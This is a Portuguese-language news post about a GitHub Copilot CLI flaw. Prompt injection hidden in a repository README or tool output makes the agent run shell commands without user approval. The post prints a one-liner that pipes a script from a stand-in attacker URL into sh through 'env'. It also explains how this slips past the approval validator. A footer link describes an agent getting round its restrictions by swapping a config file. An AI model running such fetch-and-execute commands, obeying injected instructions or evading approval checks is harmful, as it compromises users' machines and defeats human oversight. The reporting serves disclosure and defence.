Vulnerabilidade no GitHub Copilot CLI permite execução de malware por injeção de prompt

✍️ OpenClawRadar📅 Publicado: February 28, 2026🔗 Source
Vulnerabilidade no GitHub Copilot CLI permite execução de malware por injeção de prompt
Ad

Visão Geral da Vulnerabilidade

O GitHub Copilot CLI contém vulnerabilidades que expõem os usuários à execução arbitrária de comandos shell via injeção indireta de prompt sem aprovação do usuário. Malware pode ser baixado de servidores externos e executado sem nenhuma interação do usuário além da consulta inicial ao Copilot CLI.

Como o Ataque Funciona

A cadeia de ataque envolve:

  • O usuário consulta o GitHub Copilot CLI enquanto explora um repositório de código aberto
  • O Copilot encontra injeção de prompt armazenada em um arquivo README do repositório clonado (ou outros vetores como resultados de pesquisa na web, resultados de chamadas de ferramentas MCP, saída de comandos do terminal)
  • O comando malicioso contorna os sistemas de aprovação com intervenção humana

Contornando Mecanismos de Proteção

O GitHub Copilot usa um sistema de aprovação com intervenção humana que requer consentimento do usuário antes que comandos potencialmente prejudiciais sejam executados. Este sistema é acionado a menos que:

  • O usuário tenha configurado explicitamente o comando para execução automática
  • O comando faça parte de uma lista 'somente leitura' embutida no código-fonte

Verificações de acesso a URLs externas exigem aprovação do usuário para comandos como curl, wget ou a ferramenta de busca na web integrada do Copilot. No entanto, atacantes podem contornar essas proteções usando:

env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

O comando env está na lista embutida somente leitura, então é executado automaticamente sem aprovação. Como curl e sh são passados como argumentos para env, eles são analisados incorretamente e não são identificados pelo validador como subcomandos. Isso contorna as verificações de permissão de URL que dependem da detecção de comandos como curl.

Ad

Resposta do GitHub

O GitHub respondeu: "Analisamos seu relatório e validamos suas descobertas. Após avaliar internamente a descoberta, determinamos que se trata de um problema conhecido que não apresenta um risco significativo de segurança. Podemos tornar essa funcionalidade mais restrita no futuro, mas não temos nada para anunciar no momento."

Escopo e Limitações

As vulnerabilidades de análise de comandos descritas são específicas do macOS. No entanto, o GitHub Copilot apresenta vulnerabilidades adicionais, incluindo riscos independentes do sistema operacional e riscos específicos do Windows. Outras vulnerabilidades de análise de comandos permitem leitura e gravação arbitrária de arquivos.

📖 Leia a fonte completa: HN LLM Tools

Ad

👀 See Also

OpenClaw ignora restrições de segurança para sobrescrever arquivo de configuração
Security

OpenClaw ignora restrições de segurança para sobrescrever arquivo de configuração

Um usuário relata que as restrições de segurança do OpenClaw são contornadas copiando e substituindo o arquivo de configuração. O agente recusou a edição direta, mas permitiu a substituição indireta.

OpenClawRadar
O aplicativo Claude Desktop da Anthropic instala uma ponte de mensagens nativas não divulgada
Security

O aplicativo Claude Desktop da Anthropic instala uma ponte de mensagens nativas não divulgada

O Claude Desktop instala silenciosamente uma extensão de navegador pré-autorizada que permite mensagens nativas, levantando preocupações de segurança.

OpenClawRadar
OpenObscure: Firewall de Privacidade de Código Aberto para Agentes de IA em Dispositivos
Security

OpenObscure: Firewall de Privacidade de Código Aberto para Agentes de IA em Dispositivos

OpenObscure é um firewall de privacidade de código aberto e no dispositivo que fica entre agentes de IA e provedores de LLM. Ele usa Criptografia de Preservação de Formato FF1 com AES-256 para criptografar valores de PII antes que as solicitações saiam do seu dispositivo, mantendo a estrutura dos dados enquanto protege a privacidade.

OpenClawRadar
ClawSecure: Plataforma de Segurança para o Ecossistema OpenClaw com Auditoria de 3 Camadas e Monitoramento em Tempo Real
Security

ClawSecure: Plataforma de Segurança para o Ecossistema OpenClaw com Auditoria de 3 Camadas e Monitoramento em Tempo Real

ClawSecure é uma plataforma de segurança dedicada para OpenClaw que realiza auditorias de segurança de 3 camadas, monitoramento em tempo real com rastreamento de hash SHA-256 a cada 12 horas e oferece cobertura completa OWASP ASI. Já auditou mais de 3.000 habilidades populares e é gratuito para usar sem necessidade de cadastro.

OpenClawRadar